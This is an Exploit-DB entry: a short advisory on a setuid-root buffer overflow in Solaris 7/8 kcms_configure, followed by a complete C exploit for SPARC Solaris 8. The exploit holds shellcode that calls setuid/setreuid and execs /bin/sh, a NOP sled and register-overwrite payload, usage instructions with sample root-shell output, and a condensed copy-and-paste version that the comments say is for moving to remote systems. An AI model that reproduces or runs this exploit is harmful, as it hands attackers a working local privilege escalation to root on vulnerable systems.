Solaris 7/8 - 'kcms_configure' Command-Line Buffer Overflow (2)

EDB-ID:

20741




Platform:

Solaris

Date:

2001-04-09


// source: https://www.securityfocus.com/bid/2558/info
 
The Kodak Color Management System, or KCMS, is a package that ships with workstation installations of Solaris 7 and 8. kcms_configure, a part of KCMS, is vulnerable to a buffer overflow if it is passed an overly long string on the command-line by a local user. kcms_configure is installed setuid root, so a buffer overflow can lead to arbitrary code execution as root.
 
An exploit for x86 Solaris is available to attackers. 

/* kcms_configure -o -S command line buffer overflow, SPARC/solaris 8
 *
 * https://www.securityfocus.com/bid/2558
 *
 * Coded June 22, 2002 by Adam Slattery. Phear. The vulnerability
 * was discovered a long time ago (04/2001), but there haven't been
 * any published sparc exploits as far as I know (only x86).
 *
 * Adam Slattery <aslattery@sunriselinux.com>
 *
 * DESCRIPTION:
 *
 * The i386/solaris 8 exploit by eEye (Riley Hassell) was trivial. A
 * sparc version is somewhat more complicated, but not daunting. Because
 * of the location of the overflow in the program, quite a bit of code
 * gets executed before the second return (which is the jump to
 * shellcode in a sparc overflow). Some of this code relies on the
 * registers being set, and we're overwriting the saved registers
 * when we overflow the stack buffer. To remedy this situation we
 * need to overflow the stack very carefully because in the process
 * of overwriting the saved i7 register (return address), we overwrite
 * the l0-07 and i0-i6 [fp] registers. The code that gets executed before
 * the second return makes use of a few of these overwritten registers.
 * So... we overwrite these saved registers with a "good" address that
 * points to a pointer, so pretty much any code using values in the
 * registers won't try to access illegal memory and cause a seg fault.
 * It may sound sketchy, but it works.
 *
 * USAGE:
 *
 * gcc kcms_sparc.c -o kcms_sparc
 * ./kcms_sparc [offset] [ptr addr]
 *
 * $ ./kcms_sparc
 * ret address: 0xffbee4f8 [3036]  ptr address: 0xffbeecf8 buflen: 1085
 * # id
 * uid=0(root) gid=100(users)
 *
 *
 * The default offset (3036) should work. 4800 also works. Read the note
 * by the address calculations to see why (there are 2 buffers). Even
 * though it's a 1024 byte buffer, there aren't too many nops left in
 * the second buffer when everything is set so if you have to search
 * for the offet by hand, use increments of 64.
 * The [ptr addr] is an address in memory that points to a pointer.
 * This is loaded into some of the registers that get used before the
 * program jumps into shell code. If the default (0xffbeecf8) doesn't
 * work you, you probably won't be able to make a guess, so you'll
 * have to whip out gdb. If you don't have r00t (most likely), you'll
 * have to use a copy (non-suid) of kcms_configure and LD_PRELOAD a lib
 * to return 0 for geteuid/getegid (so it wonn't detect it's not uid 0).
 *
 *
 * Thanks: optyx, t12, worms, miah, Sun Microsystems, Kodak...
 *
 * Langrets - thanks for making me cookies after I had surgery, which
 *    was the week before I actually released this. They tasted 31337++.
 *
 *
 * random greetz: xexen, rogers, kanu, cyun, cua0, dap, f3tus, xaiou,
 *		langrets, janebond, applejacks, wisdmckr3, cbo2000
 *
 * stupid people: #legions (esp. digiebola, pr00f, gridmark),
 *		MIT, Stanford, Olin (those bastards all turned me down)
 */

#include <stdio.h>
#include <unistd.h>

/* some .s asm code was used from dopesquad.net */
u_char shellcode[] = /* aslattery@sunriselinux.com */

//setuid(0)
  "\x90\x1b\xc0\x0f" /* xor	%o7,%o7,%o0 */
  "\x82\x10\x20\x17" /* mov	23,%g1 */
  "\x91\xd0\x20\x08" /* ta	8 */

/* For some messed up reason it doesn't seem to work if i
 * use one or the other syscall, but it does if i use both. I
 * don't feel like playing with shellcode anymore right now, and
 * this works, so I don't care.
 */
//setreuid(0,0)
  "\x92\x1a\x40\x09" /* xor	%o1,%o1,%o1 */
  "\x82\x10\x20\xca" /* mov	202, %g1 */
  "\x91\xd0\x20\x08" /* ta	8 */

//exec(/bin/sh)
  "\x21\x0b\xd8\x9a" /* sethi	%hi(0x2f626800), %l0 */
  "\xa0\x14\x21\x6e" /* or	%l0, 0x16e, %l0 ! 0x2f62696e */
  "\x23\x0b\xdc\xda" /* sethi	%hi(0x2f736800), %l1 */
  "\x90\x23\xa0\x10" /* sub	%sp, 16, %o0 */
  "\x92\x23\xa0\x08" /* sub	%sp, 8, %o1 */
  "\x94\x1b\x80\x0e" /* xor	%sp, %sp, %o2 */
  "\xe0\x3b\xbf\xf0" /* std	%l0, [%sp - 16] */
  "\xd0\x23\xbf\xf8" /* st	%o0, [%sp - 8] */
  "\xc0\x23\xbf\xfc" /* st	%g0, [%sp - 4] */
  "\x82\x10\x20\x3b" /* mov	59, %g1 */
  "\x91\xd0\x20\x08" /* ta	8 */
;

u_char NOP[4] = "\xa6\x1c\xc0\x13"; /* xor %l3, %l3, %l3 */


/* we need 1085 bytes to overwrite saved i7 */
/* the vulnerable buffer is a 1024 bytes long */
#define BIGBUF 1086

/* Offsets to saved registers in relation to the bottom of the buffer: */
#define l0_OFFSET 1025
#define i7_OFFSET 1081


/* figure out where the stack starts so we have a rough guestimation */
u_long get_sp(void)
{
   __asm__("mov %sp, %i0\n");
}

int main(int argc, char **argv)
{
   u_char buf[BIGBUF+6];
   int i, offset;
   u_long addr;
   u_long paddr;

   if(argc > 1)
      if(!strcmp(argv[1], "-h") || !strcmp(argv[1], "--help"))
       {
         printf("%s [retaddr offset] [ptraddr]\n", argv[0]);
         exit(0);
       }

   /* Calculate the return address to put in i7.
    * 3036 should dump us into the nops just fine.
    * We actually have 2 different windows with about 900 bytes
    * of nops each because the buffer we overflow gets copied into
    * another 1024 byte buffer directly below it on the stack.
    * This actually overwrites the first couple hundred nops,
    * but we still have a bunch, so it's ok.
    */
   addr = get_sp();
   if(argc > 1)
      offset = atoi(argv[1]);
   else
      offset = 3036;
   addr -= offset;

   if(argc > 2)
      paddr = strtoul(argv[2], NULL, 0);
   else
      paddr = 0xffbeecf8; //0xffbee3e8 might work too;

   memset(buf, 255, BIGBUF);

   /* Copy NOPS until ~80 bytes before the end of vulnbuf */
   for(i = 1; i < 940 ; i+=4)
      memcpy(buf+i, NOP, 4);

   /* Copy shellcode */
   memcpy(buf+i, shellcode, strlen(shellcode));

   /* because so much code gets executed before the second return, we
    * have to overwrite the stack with very precise data. Finding the
    * right values takes some time in gdb, but it turns out we just need
    * a value that points to some valid memory that points somewhere else.
    * Additionally, this address + 8 needs to do the same. So we need a 
    * string of pointers to pointers. Luckily, this happens quite
    * frequently by blind luck. It just takes some searching in gdb.
    *
    * We just fill all the registers (except i7) with this address. I
    * started with just i1, i4, and i6(fp), and this worked great
    * testing as a normal user, but the program's execution is slightly
    * different when it runs as root (mkdir doesn't fail :), so it was
    * seg faulting and i couldn't figure out why (debugging suid binaries
    * as a normal user is impossible :). So instead of wrapping all these
    * damn library calls through my LD_PRELOADed geteuid() library, I
    * tried filling all the registers. b00m. It worked.
    */

   /* l0-l7 and i0-i6(fp) */
   for(i=l0_OFFSET ; i < i7_OFFSET ; i+=4)
      memcpy(&buf[i], &paddr, 4);

   /* i7, return address */
   memcpy(&buf[i7_OFFSET], &addr, 4);

   /* Null terminate */
   buf[i7_OFFSET+4] = '\0';

   printf("ret address: 0x%x [%d]  ptr address: 0x%x  len: %d\n", \
		addr, offset, paddr, strlen(buf));
   /* b00m! */
   execl("/usr/X/bin/kcms_configure", "pine", "-o", "-S", \
	"blah", buf, NULL);

   puts("execl failed");
return 0;
}



#ifdef UGLY_COPY_AND_PASTE_VERSION
// Fits in a single terminal screen, makes it easier to copy&paste
// the exploit to a remote system. Maybe I'm being a little bit too
// nice to the kiddies? It even has a nice smiley face :)
// ... BEGIN ...

#include <stdio.h>
#include <sys/types.h>
u_char shellcode[] =
"\x90\x1b\xc0\x0f\x82\x10\x20\x17\x91\xd0\x20\x08\x92\x1a\x40\x09"
"\x82\x10\x20\xca\x91\xd0\x20\x08\x21\x0b\xd8\x9a\xa0\x14\x21\x6e"
"\x23\x0b\xdc\xda\x90\x23\xa0\x10\x92\x23\xa0\x08\x94\x1b\x80\x0e"
"\xe0\x3b\xbf\xf0\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b"
"\x91\xd0\x20\x08"; u_char NOP[4]="\xa6\x1c\xc0\x13"; u_long
get_sp(void){__asm__("mov %sp, %i0\n");}int main(int ac,char **av)
{ u_char    buf[1092];int i,    offset; u_long addr; u_long pa;
if(ac>1)    if(!strcmp(av[1],   "-h")||!strcmp(av[1],"--help")) {
printf("%s  [retaddr offset]    [ptraddr]\n", av[0]); exit(0); }
addr=get_sp(); if(   ac>1) offset=atoi(av[1]); else offset=3036;
addr-=offset;if(ac   >2)pa=strtoul(av[2],NULL,0);else pa=0xffbeecf8;
memset(buf    ,255,1086);for   (i=1;i<940;i+=4) memcpy(buf+i,NOP,4);
memcpy(buf+    i,shellcode    ,strlen(shellcode)); for(i=1025;i<1081;
i+=4) memcpy(               &buf[i], &pa, 4); memcpy(&buf[1081],
&addr,4);buf[1085]='\0';printf("ret: 0x%x [%d] ptr: 0x%x len: %d\n",
addr,offset,pa,strlen(buf)); execl("/usr/X/bin/kcms_configure",
"pine","-o","-S","blah",buf,NULL); puts("exec failed"); return 0; }
// ... END ...
#endif